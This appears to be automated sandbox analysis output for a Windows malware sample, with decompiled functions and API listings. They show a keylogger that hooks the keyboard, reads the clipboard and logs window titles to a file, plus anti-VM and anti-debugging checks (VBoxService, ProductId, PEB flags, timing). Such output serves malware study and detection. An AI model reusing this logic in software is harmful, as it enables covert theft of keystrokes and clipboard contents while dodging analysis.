								_t415 = E00C82E48( &_v830) + _t414;
								__eflags = _t415;
								_t416 =  *0xc8dee0; // 0xc1f6
								_t417 =  *0xc8b0b8; // 0x0
								PostMessageA(_t417, _t416, _t415, _t497);
							}
						}
						E00C81BD8( &_v40, 0xc872cc);
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v40) + _t382);
						_t385 = E00C81CF4(_v40);
						_t386 =  *0xc8dee8; // 0x0
						_pop(_t531);
						E00C85084(_t386, _t531, _t385);
						__eflags =  *0xc8b0b8;
						if( *0xc8b0b8 != 0) {
							__eflags =  *0xc8b0bc - 1;
							if( *0xc8b0bc == 1) {
								_t496 = VirtualAlloc(0, E00C81D04(_v40) + _t389, 0x1000, 0x40);
								_push(E00C81D04(_v40) + _t393);
								E00C82914(_t496, E00C81CF4(_v40));
								_t401 = E00C81D04(_v40) + _t400;
								__eflags = _t401;
								_t402 =  *0xc8dee0; // 0xc1f6
								_t403 =  *0xc8b0b8; // 0x0
								PostMessageA(_t403, _t402, _t401, _t496);
							}
						}
						 *0xc8dff4 = 0;
						 *0xc8dff5 = 0;
						goto L28;
					}
				} else {
					if( *0xc8b0c4 != 0) {
						_t485 =  *0xc8b0c4; // 0x0
						UnhookWindowsHookEx(_t485);
					}
					 *0xc8b0c4 = SetWindowsHookExW(0xd, E00C86748, GetModuleHandleA(0), 0);
					L58:
					_pop(_t539);
					 *[fs:eax] = _t539;
					_push(E00C87281);
					E00C81B78( &_v40);
					return E00C81B90( &_v24, 2);
				}
			}

0x00c86951
0x00c86952
0x00c86953
0x00c86956
0x00c86959
0x00c8695c
0x00c8695f
0x00c86962
0x00c86965
0x00c8696a
0x00c8696b
0x00c86970
0x00c86973
0x00c86982
0x00c86985
0x00c8698b
0x00c869c2
0x00c869c8
0x00c86f8e
0x00c86f94
0x00c871bb
0x00c871c1
0x00c871e0
0x00c871e6
0x00c87203
0x00c87209
0x00c8720b
0x00c87212
0x00c8721a
0x00c87220
0x00c87225
0x00c8722b
0x00c87230
0x00c8723a
0x00c87244
0x00c8724b
0x00c8724d
0x00c87252
0x00c87252
0x00c8724b
0x00c87212
0x00c871e8
0x00c871e8
0x00c871ef
0x00c871fe
0x00c871f1
0x00c871f1
0x00c871f7
0x00c871f7
0x00c871ef
0x00c871c3
0x00c871c3
0x00c871ca
0x00c871cc
0x00c871d2
0x00c871d2
0x00c871d9
0x00c871d9
0x00000000
0x00c871c1
0x00c86f9a
0x00c86fa1
0x00000000
0x00000000
0x00c86fa7
0x00c86fae
0x00c86fc1
0x00c86fcf
0x00c86fdc
0x00c86fe1
0x00c86fe3
0x00000000
0x00000000
0x00c86fe9
0x00c86fed
0x00c86ffb
0x00000000
0x00000000
0x00c87001
0x00c87001
0x00c87008
0x00c87012
0x00c8701a
0x00c8701b
0x00c87027
0x00c8702b
0x00c87034
0x00c87039
0x00c8703a
0x00c87042
0x00c87043
0x00c8704d
0x00c8704d
0x00c87052
0x00c87057
0x00c87058
0x00c87058
0x00c87065
0x00c8706d
0x00c8706e
0x00c8707a
0x00c8707e
0x00c87085
0x00c8708a
0x00c8708b
0x00c87096
0x00c870a7
0x00c870b6
0x00c870bb
0x00c870c8
0x00c870d0
0x00c870d1
0x00c870dd
0x00c870e1
0x00c870ea
0x00c870ef
0x00c870f0
0x00c87101
0x00c87106
0x00c8710e
0x00c8710f
0x00c8711b
0x00c8711e
0x00c87123
0x00c87124
0x00c87131
0x00c87139
0x00c8713a
0x00c87146
0x00c8714a
0x00c87151
0x00c87156
0x00c87157
0x00c87164
0x00c8716c
0x00c8716d
0x00c87179
0x00c8717d
0x00c87186
0x00c8718b
0x00c8718c
0x00c87194
0x00c87195
0x00c871a1
0x00c871a4
0x00c871a9
0x00c871aa
0x00c871af
0x00000000
0x00c871af
0x00c86fef
0x00c86ff3
0x00000000
0x00000000
0x00000000
0x00c86ff9
0x00c86fb0
0x00000000
0x00c869ce
0x00c869d9
0x00c869e1
0x00c869e9
0x00c869f8
0x00c869fd
0x00c86a0a
0x00c86a12
0x00c86a17
0x00c86a1f
0x00c86a24
0x00c86a27
0x00c86a2a
0x00c86a34
0x00c86a34
0x00c86a3c
0x00c86a41
0x00c86a43
0x00000000
0x00000000
0x00c86a65
0x00c86a6a
0x00c86a71
0x00000000
0x00000000
0x00c86a77
0x00c86a7a
0x00c86df8
0x00c86df8
0x00c86dff
0x00c86e0d
0x00c86e15
0x00c86e16
0x00c86e22
0x00c86e26
0x00c86e2f
0x00c86e34
0x00c86e35
0x00c86e3d
0x00c86e3e
0x00c86e4a
0x00c86e4d
0x00c86e52
0x00c86e53
0x00c86e60
0x00c86e68
0x00c86e69
0x00c86e75
0x00c86e79
0x00c86e80
0x00c86e85
0x00c86e86
0x00c86e91
0x00c86ea2
0x00c86eb1
0x00c86eb6
0x00c86ec3
0x00c86ecb
0x00c86ecc
0x00c86ed6
0x00c86ed6
0x00c86edc
0x00c86ee3
0x00c86ee8
0x00c86ee9
0x00c86ee9
0x00c86ef1
0x00c86ef2
0x00c86efe
0x00c86f02
0x00c86f09
0x00c86f0e
0x00c86f0f
0x00c86f14
0x00c86f1b
0x00c86f1d
0x00c86f24
0x00c86f3f
0x00c86f4b
0x00c86f59
0x00c86f67
0x00c86f67
0x00c86f6a
0x00c86f70
0x00c86f76
0x00c86f76
0x00c86f24
0x00c86f7b
0x00c86f82
0x00000000
0x00c86f82
0x00c86a80
0x00c86a87
0x00c86a95
0x00c86a9d
0x00c86a9e
0x00c86aaa
0x00c86aae
0x00c86ab5
0x00c86aba
0x00c86abb
0x00c86ac0
0x00c86ac7
0x00c86ac9
0x00c86ad0
0x00c86aeb
0x00c86af7
0x00c86b05
0x00c86b13
0x00c86b13
0x00c86b16
0x00c86b1c
0x00c86b22
0x00c86b22
0x00c86ad0
0x00c86ac7
0x00c86b2f
0x00c86b37
0x00c86b38
0x00c86b44
0x00c86b48
0x00c86b4f
0x00c86b54
0x00c86b55
0x00c86b5d
0x00c86b5e
0x00c86b6a
0x00c86b6e
0x00c86b75
0x00c86b7a
0x00c86b7b
0x00c86b80
0x00c86b87
0x00c86b89
0x00c86b90
0x00c86bab
0x00c86bb7
0x00c86bc5
0x00c86bd3
0x00c86bd3
0x00c86bd6
0x00c86bdc
0x00c86be2
0x00c86be2
0x00c86b90
0x00c86bef
0x00c86bf7
0x00c86bf8
0x00c86c04
0x00c86c08
0x00c86c0f
0x00c86c14
0x00c86c15
0x00c86c22
0x00c86c2a
0x00c86c2b
0x00c86c37
0x00c86c3b
0x00c86c42
0x00c86c47
0x00c86c48
0x00c86c4d
0x00c86c54
0x00c86c56
0x00c86c5d
0x00c86c78
0x00c86c84
0x00c86c92
0x00c86ca0
0x00c86ca0
0x00c86ca3
0x00c86ca9
0x00c86caf
0x00c86caf
0x00c86c5d
0x00c86cba
0x00c86ccb
0x00c86cda
0x00c86cdf
0x00c86ce4
0x00c86ceb
0x00c86ced
0x00c86cf4
0x00c86d12
0x00c86d1a
0x00c86d2b
0x00c86d3c
0x00c86d3c
0x00c86d3f
0x00c86d45
0x00c86d4b
0x00c86d4b
0x00c86cf4
0x00c86d58
0x00c86d60
0x00c86d61
0x00c86d6d
0x00c86d71
0x00c86d78
0x00c86d7d
0x00c86d7e
0x00c86d83
0x00c86d8a
0x00c86d8c
0x00c86d93
0x00c86dae
0x00c86dba
0x00c86dc8
0x00c86dd6
0x00c86dd6
0x00c86dd9
0x00c86ddf
0x00c86de5
0x00c86de5
0x00c86d93
0x00c86dea
0x00c86df1
0x00000000
0x00c86df1
0x00c8698d
0x00c86994
0x00c86996
0x00c8699c
0x00c8699c
0x00c869b8
0x00c87257
0x00c87259
0x00c8725c
0x00c8725f
0x00c87267
0x00c87279
0x00c87279

APIs

Part of subcall function 00C85568: ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
Part of subcall function 00C85568: ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06
Part of subcall function 00C85568: MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
Part of subcall function 00C85568: MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
Part of subcall function 00C85568: ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C8389C: OpenClipboard.USER32 ref: 00C838BD
Part of subcall function 00C8389C: GetClipboardData.USER32(0000000D), ref: 00C838DA
Part of subcall function 00C8389C: GlobalFix.KERNEL32(00000000), ref: 00C838FA
Part of subcall function 00C8389C: GlobalSize.KERNEL32(00000000), ref: 00C83905
Part of subcall function 00C8389C: GlobalUnWire.KERNEL32(00000000), ref: 00C83925
Part of subcall function 00C8389C: CloseClipboard.USER32 ref: 00C83943

Part of subcall function 00C85084: WriteFile.KERNEL32(00000000,?,00000002,?,?), ref: 00C850AA

Part of subcall function 00C86890: GetLocalTime.KERNEL32 ref: 00C86897
Part of subcall function 00C86890: GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,?,000000FF), ref: 00C868B0
Part of subcall function 00C86890: GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C868E0

DefWindowProcA.USER32(?,?,?,?), ref: 00C8697D
UnhookWindowsHookEx.USER32(00000000), ref: 00C8699C
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00C8727A), ref: 00C869A5
SetWindowsHookExW.USER32(0000000D,Function_00006748,00000000,00000000), ref: 00C869B3
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00C8727A), ref: 00C86A0A

Part of subcall function 00C868EC: GetForegroundWindow.USER32 ref: 00C86914
Part of subcall function 00C868EC: GetWindowTextW.USER32(00000000,?,00002712), ref: 00C8692A

VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,?,?,?,00000000,00008000,00000000,00C8727A), ref: 00C86AE6
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86B22
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,?,?,?,00000000,00008000,00000000,00C8727A), ref: 00C86BA6
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86BE2
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,00000000), ref: 00C86C73
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86CAF
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,?,?), ref: 00C86D0D
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86D4B
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00C86DA9
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86DE5
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,?,?,?,00000000,00008000,00000000,00C8727A), ref: 00C86F3A
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86F76

Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

UnhookWindowsHookEx.USER32(00000000), ref: 00C871D2
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00C8727A), ref: 00C87220
SetEndOfFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00C8727A), ref: 00C8722B

Part of subcall function 00C853EC: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
Part of subcall function 00C853EC: RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
Part of subcall function 00C853EC: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Part of subcall function 00C81B78: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C881BC, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 65

C-Code - Quality: 70%

			E00C881BC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v264;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				void* _t35;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				void* _t58;
				void* _t61;

				_t56 = __edi;
				_v304 = 0;
				_v312 = 0;
				_v316 = 0;
				_v308 = 0;
				_push(_t61);
				_push(0xc882b4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xfffffec8;
				_t58 = E00C8809C(2, 0);
				_v300 = 0x128;
				while(E00C880BC(_t58,  &_v300) != 0) {
					E00C81958( &_v308, 0x104,  &_v264);
					E00C82D90(_v308, 0,  &_v304, _t56, _t58, __eflags);
					_push(_v304);
					E00C82D90("VBoxService.exe", 0,  &_v316, _t56, _t58, __eflags);
					E00C81928( &_v312, E00C81A48(_v316));
					_pop(_t53);
					_t35 = E00C81A9C(_v312, _t53);
					__eflags = _t35;
					if(_t35 <= 0) {
						continue;
					} else {
						CloseHandle(_t58);
					}
					L5:
					_pop(_t54);
					 *[fs:eax] = _t54;
					_push(E00C882BB);
					return E00C81770( &_v316, 4);
				}
				CloseHandle(_t58);
				goto L5;
			}

0x00c881bc
0x00c881c9
0x00c881cf
0x00c881d5
0x00c881db
0x00c881e3
0x00c881e4
0x00c881e9
0x00c881ec
0x00c881fd
0x00c881ff
0x00c8827b
0x00c8821c
0x00c8822d
0x00c88238
0x00c88244
0x00c8825c
0x00c88267
0x00c88268
0x00c8826d
0x00c8826f
0x00000000
0x00c88271
0x00c88272
0x00c88277
0x00c88296
0x00c88298
0x00c8829b
0x00c8829e
0x00c882b3
0x00c882b3
0x00c88291
0x00000000

APIs

Part of subcall function 00C82D90: CharUpperA.USER32(?), ref: 00C82DCE

CloseHandle.KERNEL32(00000000), ref: 00C88272
CloseHandle.KERNEL32(00000000), ref: 00C88291

Strings

VBoxService.exe, xrefs: 00C8823F

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C8854C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58

C-Code - Quality: 37%

			E00C8854C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t28;
				intOrPtr _t41;
				intOrPtr _t45;
				intOrPtr _t50;
				intOrPtr _t51;
				void* _t52;

				_t52 = __eflags;
				_t48 = __esi;
				_t47 = __edi;
				_t50 = _t51;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t50);
				_push(0xc885f7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_push(_t50);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				_v8 = 0x100;
				E00C81AE4( &_v12, _v8);
				GetUserNameA(E00C81A48(_v12),  &_v8);
				_pop(_t41);
				 *[fs:eax] = _t41;
				E00C82D90(_v12, __ebx,  &_v16, __edi, __esi, _t52);
				_push(_v16);
				E00C82D90("CurrentUser", __ebx,  &_v20, _t47, _t48, _t52);
				_pop(_t28);
				E00C81994(_t28, _v20);
				_t45 = 0xc885a2;
				 *[fs:eax] = _t45;
				_push(E00C885FE);
				return E00C81770( &_v20, 3);
			}

0x00c8854c
0x00c8854c
0x00c8854c
0x00c8854d
0x00c88551
0x00c88552
0x00c88553
0x00c88554
0x00c88555
0x00c88556
0x00c88557
0x00c8855a
0x00c8855b
0x00c88560
0x00c88563
0x00c88568
0x00c8856e
0x00c88571
0x00c88574
0x00c88581
0x00c88593
0x00c8859a
0x00c8859d
0x00c885ba
0x00c885c2
0x00c885cb
0x00c885d3
0x00c885d4
0x00c885de
0x00c885e1
0x00c885e4
0x00c885f6

APIs

GetUserNameA.ADVAPI32(00000000,?), ref: 00C88593

Part of subcall function 00C82D90: CharUpperA.USER32(?), ref: 00C82DCE

Strings

CurrentUser, xrefs: 00C885C6

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C823E8, Relevance: 3.0, APIs: 2, Instructions: 10
thread

C-Code - Quality: 100%

			E00C823E8() {
				long _t3;

				 *0xc8c590 = GetProcessHeap();
				 *0xc8c000 = E00C82144;
				 *0xc8c02c = 0xd7b0;
				 *0xc8c1f8 = 0xd7b0;
				 *0xc8c3c4 = 0xd7b0;
				E00C82114();
				_t3 = GetCurrentThreadId();
				 *0xc8c01c = _t3;
				return _t3;
			}

0x00c823ee
0x00c823f3
0x00c823fd
0x00c82406
0x00c8240f
0x00c82418
0x00c8241d
0x00c82422
0x00c82427

APIs

GetProcessHeap.KERNEL32 ref: 00C823E8
GetCurrentThreadId.KERNEL32 ref: 00C8241D

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C886CC, Relevance: 1.3, Strings: 1, Instructions: 24

C-Code - Quality: 37%

			E00C886CC(void* __ebx) {
				char _v8;
				intOrPtr _t15;

				_push(0);
				_push(0xc88722);
				_push( *[fs:eax]);
				 *[fs:eax] = _t15;
				E00C817E4( &_v8, "DAEMON");
				_push(0);
				_push(_v8);
				if(( *( *[fs:0x30] + 2) & 0x000000ff) != 0) {
					return 1;
				} else {
					return 0;
				}
			}

0x00c886cf
0x00c886d5
0x00c886da
0x00c886dd
0x00c886e8
0x00c886ed
0x00c886ef
0x00c886ff
0x00c8870b
0x00c88701
0x00c88704
0x00c88704

Strings

DAEMON, xrefs: 00C886E3

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C88674, Relevance: .0, Instructions: 21

C-Code - Quality: 100%

			E00C88674() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t12;
				signed int _t13;

				_t13 =  *( *[fs:0x30] + 2) & 0x000000ff;
				if(_t13 == 0 || _t13 == 0) {
					_v8 = 1;
				}
				_v12 = 1;
				if(_v12 == 1) {
					_t12 = 1;
				}
				if(_v8 == 1) {
					_t12 = 0;
				}
				return _t12;
			}

0x00c88685
0x00c88687
0x00c8868b
0x00c8868b
0x00c88692
0x00c8869d
0x00c8869f
0x00c8869f
0x00c886a5
0x00c886a7
0x00c886a7
0x00c886ae

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C88760, Relevance: .0, Instructions: 5

C-Code - Quality: 100%

			E00C88760() {
				intOrPtr _t7;

				_t7 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				 *((intOrPtr*)(_t7 + 0x20)) =  *((intOrPtr*)(_t7 + 0x20)) + 0x2000;
				return _t7;
			}

0x00c8876a
0x00c8876d
0x00c88774

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C88918, Relevance: 43.7, APIs: 29, Instructions: 200

C-Code - Quality: 90%

			E00C88918(void* __edx, void* __edi, intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t15;
				long _t17;
				intOrPtr _t48;
				void* _t52;
				long _t53;
				intOrPtr* _t54;

				_t52 = __edi;
				_t48 = _a4;
				if( *((char*)(_t48 + 0x1541)) == 1) {
					_t15 = E00C882DC();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1542)) == 1) {
					_t15 = L00C88158(_t48, _t53);
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1543)) == 1) {
					_t15 = E00C88114();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				_t61 =  *((char*)(_t48 + 0x1544)) - 1;
				if( *((char*)(_t48 + 0x1544)) == 1) {
					_t15 = E00C881BC(_t48, _t52, _t53, _t61);
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1545)) == 1) {
					_t15 = E00C88300();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1546)) == 1) {
					_t15 = E00C88494();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1547)) == 1) {
					_t15 = E00C883DC();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1548)) == 1) {
					_t15 = E00C88324();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				_t71 =  *((char*)(_t48 + 0x1549)) - 1;
				if( *((char*)(_t48 + 0x1549)) == 1) {
					_t15 = E00C8854C(_t48, _t52, _t53, _t71);
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x154a)) == 1) {
					_t15 = E00C8887C();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x154b)) == 1) {
					_t15 = E00C886B0();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x154c)) == 1) {
					_t53 = GetTickCount();
					if(E00C88740(L00C88158) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C881BC) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C882DC) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88300) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88324) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C883DC) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88494) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C8854C) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C886CC) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88760) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C887A4) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C8887C) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C886B0) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88114) != 0) {
						ExitProcess(0);
					}
					_t15 = E00C886CC(_t48);
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x154c)) != 1) {
					L70:
					return _t15;
				} else {
					E00C88760();
					_t17 = GetTickCount();
					_push(0);
					asm("cdq");
					 *_t54 =  *_t54 - _t53;
					asm("sbb [esp+0x4], edx");
					_t15 = _t17;
					if(0 != 0) {
						if(0 <= 0) {
							goto L70;
						}
						L69:
						ExitProcess(0);
						return _t15;
					}
					if(_t15 <= 0x1388) {
						goto L70;
					} else {
						goto L69;
					}
				}
			}

0x00c88918
0x00c8891d
0x00c88927
0x00c88929
0x00c88930
0x00c88934
0x00c88934
0x00c88930
0x00c88940
0x00c88942
0x00c88949
0x00c8894d
0x00c8894d
0x00c88949
0x00c88959
0x00c8895b
0x00c88962
0x00c88966
0x00c88966
0x00c88962
0x00c8896b
0x00c88972
0x00c88974
0x00c8897b
0x00c8897f
0x00c8897f
0x00c8897b
0x00c8898b
0x00c8898d
0x00c88994
0x00c88998
0x00c88998
0x00c88994
0x00c889a4
0x00c889a6
0x00c889ad
0x00c889b1
0x00c889b1
0x00c889ad
0x00c889bd
0x00c889bf
0x00c889c6
0x00c889ca
0x00c889ca
0x00c889c6
0x00c889d6
0x00c889d8
0x00c889df
0x00c889e3
0x00c889e3
0x00c889df
0x00c889e8
0x00c889ef
0x00c889f1
0x00c889f8
0x00c889fc
0x00c889fc
0x00c889f8
0x00c88a08
0x00c88a0a
0x00c88a11
0x00c88a15
0x00c88a15
0x00c88a11
0x00c88a21
0x00c88a23
0x00c88a2a
0x00c88a2e
0x00c88a2e
0x00c88a2a
0x00c88a3a
0x00c88a45
0x00c88a53
0x00c88a57
0x00c88a57
0x00c88a68
0x00c88a6c
0x00c88a6c
0x00c88a7d
0x00c88a81
0x00c88a81
0x00c88a92
0x00c88a96
0x00c88a96
0x00c88aa7
0x00c88aab
0x00c88aab
0x00c88abc
0x00c88ac0
0x00c88ac0
0x00c88ad1
0x00c88ad5
0x00c88ad5
0x00c88ae6
0x00c88aea
0x00c88aea
0x00c88afb
0x00c88aff
0x00c88aff
0x00c88b10
0x00c88b14
0x00c88b14
0x00c88b25
0x00c88b29
0x00c88b29
0x00c88b3a
0x00c88b3e
0x00c88b3e
0x00c88b4f
0x00c88b53
0x00c88b53
0x00c88b64
0x00c88b68
0x00c88b68
0x00c88b6d
0x00c88b74
0x00c88b78
0x00c88b78
0x00c88b74
0x00c88b84
0x00c88bba
0x00c88bba
0x00c88b86
0x00c88b86
0x00c88b8b
0x00c88b92
0x00c88b96
0x00c88b97
0x00c88b9a
0x00c88b9e
0x00c88ba3
0x00c88bae
0x00000000
0x00000000
0x00c88bb0
0x00c88bb2
0x00000000
0x00c88bb2
0x00c88baa
0x00000000
0x00c88bac
0x00000000
0x00c88bac
0x00c88baa

APIs

ExitProcess.KERNEL32(00000000), ref: 00C88934
ExitProcess.KERNEL32(00000000), ref: 00C8894D
ExitProcess.KERNEL32(00000000), ref: 00C88966
ExitProcess.KERNEL32(00000000), ref: 00C8897F
ExitProcess.KERNEL32(00000000), ref: 00C88998
ExitProcess.KERNEL32(00000000), ref: 00C889B1
ExitProcess.KERNEL32(00000000), ref: 00C889CA
ExitProcess.KERNEL32(00000000), ref: 00C889E3
ExitProcess.KERNEL32(00000000), ref: 00C889FC
ExitProcess.KERNEL32(00000000), ref: 00C88A15
ExitProcess.KERNEL32(00000000), ref: 00C88A2E
GetTickCount.KERNEL32(00000000), ref: 00C88A40
ExitProcess.KERNEL32(00000000), ref: 00C88A57
ExitProcess.KERNEL32(00000000), ref: 00C88A6C
ExitProcess.KERNEL32(00000000), ref: 00C88A81
ExitProcess.KERNEL32(00000000), ref: 00C88B78

Part of subcall function 00C88300: GetModuleHandleA.KERNEL32(dbghelp.dll,?,00C88992), ref: 00C88308

Part of subcall function 00C881BC: CloseHandle.KERNEL32(00000000), ref: 00C88272
Part of subcall function 00C881BC: CloseHandle.KERNEL32(00000000), ref: 00C88291

ExitProcess.KERNEL32(00000000), ref: 00C88A96
ExitProcess.KERNEL32(00000000), ref: 00C88AAB
GetTickCount.KERNEL32(00000000), ref: 00C88B8B

Part of subcall function 00C883DC: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C883F4
Part of subcall function 00C883DC: RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8841D
Part of subcall function 00C883DC: RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C88433

Part of subcall function 00C88494: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884AC
Part of subcall function 00C88494: RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884D5
